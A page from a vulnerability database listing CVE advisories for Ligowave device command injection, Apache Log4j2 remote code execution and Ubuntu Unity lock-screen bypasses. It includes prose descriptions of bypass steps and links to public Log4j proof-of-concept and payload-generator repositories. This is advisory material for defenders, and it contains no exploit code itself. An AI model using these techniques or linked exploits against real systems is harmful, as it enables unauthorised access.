CVE-2024-4999 – Ligowave Unity/Pro/Mimo/APC Arbitrary Command Injection
https://notcve.org/view.php?id=CVE-2024-4999
A vulnerability in the web-based management interface of multiple Ligowave devices could allow an authenticated remote attacker to execute arbitrary commands with elevated privileges.This issue affects UNITY: through 6.95-2; PRO: through 6.95-1.Rt3883; MIMO: through 6.95-1.Rt2880; APC Propeller: through 2-5.95-4.Rt3352. • https://onekey.com/blog/security-advisory-remote-code-execution-in-ligowave-devices • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVE-2021-44228 – Apache Log4j2 Remote Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. • https://github.com/fullhunt/log4j-scan https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words https://github.com/cyberstruggle/L4sh https://github.com/woodpecker-appstore/log4j-payload-generator https://github.com/tangxiaofeng7/apache-log4j-poc https://www.exploit-db.com/exploits/51183 https://www.exploit-db.com/exploits/50592 https://www.exploit-db.com/exploits/50590 https://github.com/logpresso/CVE-2021-44228-Scanner https://github.com/jas502n/Log4j2-CVE-2021-44228 h • CWE-20: Improper Input Validation CWE-400: Uncontrolled Resource Consumption CWE-502: Deserialization of Untrusted Data CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') •
CVE-2014-5195
https://notcve.org/view.php?id=CVE-2014-5195
Unity before 7.2.3 and 7.3.x before 7.3.1, as used in Ubuntu, does not properly take focus of the keyboard when switching to the lock screen, which allows physically proximate attackers to bypass the lock screen by (1) leveraging a machine that had text selected when locking or (2) resuming from a suspension. Unity anterior a 7.2.3 y 7.3.x anterior a 7.3.1, utilizado en Ubuntu, no toma enfoque debidamente del teclado cuando cambia al bloqueo de pantalla, lo que permite a atacantes físicamente próximos evadir el bloqueo de pantalla mediante (1) el aprovechamiento de una maquina que tenía texto seleccionado cuando bloqueó o (2) el volver desde una suspensión. • http://www.osvdb.org/109788 http://www.securityfocus.com/bid/68987 http://www.ubuntu.com/usn/USN-2303-1 https://bugs.launchpad.net/unity/7.2/+bug/1349128 https://exchange.xforce.ibmcloud.com/vulnerabilities/95199 • CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') •
CVE-2014-3204
https://notcve.org/view.php?id=CVE-2014-3204
Unity before 7.2.1, as used in Ubuntu 14.04, does not properly handle keyboard shortcuts, which allows physically proximate attackers to bypass the lock screen and execute arbitrary commands, as demonstrated by right-clicking on the indicator bar and then pressing the ALT and F2 keys. Unity anterior a 7.2.1, utilizado en Ubuntu 14.04, no maneja debidamente accesos directos de teclado, lo que permite a atacantes físicamente próximos evadir la pantalla de bloqueo y ejecutar comandos arbitrarios, tal y como fue demostrado presionando el botón derecho en la barra de indicador y posteriormente presionando las teclas ALT y F2. • http://ubuntu.com/usn/usn-2184-1 http://www.openwall.com/lists/oss-security/2014/04/29/2 http://www.openwall.com/lists/oss-security/2014/05/03/1 http://www.securityfocus.com/bid/67117 https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1313885 • CWE-264: Permissions, Privileges, and Access Controls •
CVE-2014-3202
https://notcve.org/view.php?id=CVE-2014-3202
Unity before 7.2.1 does not properly handle entry activation, which allows physically proximate attackers to bypass the lock screen by holding the ENTER key, which triggers the process to crash. Unity anterior a 7.2.1 no maneja debidamente activación de entrada, lo que permite a atacantes físicamente próximos evadir la pantalla de bloqueo mediante la presión continua sobre la tecla ENTER, lo que provoca la caída del proceso. • http://www.openwall.com/lists/oss-security/2014/04/26/1 http://www.openwall.com/lists/oss-security/2014/04/26/2 http://www.openwall.com/lists/oss-security/2014/04/29/2 http://www.openwall.com/lists/oss-security/2014/05/03/1 https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 https://bugs.launchpad.net/unity/+bug/1308750 • CWE-264: Permissions, Privileges, and Access Controls •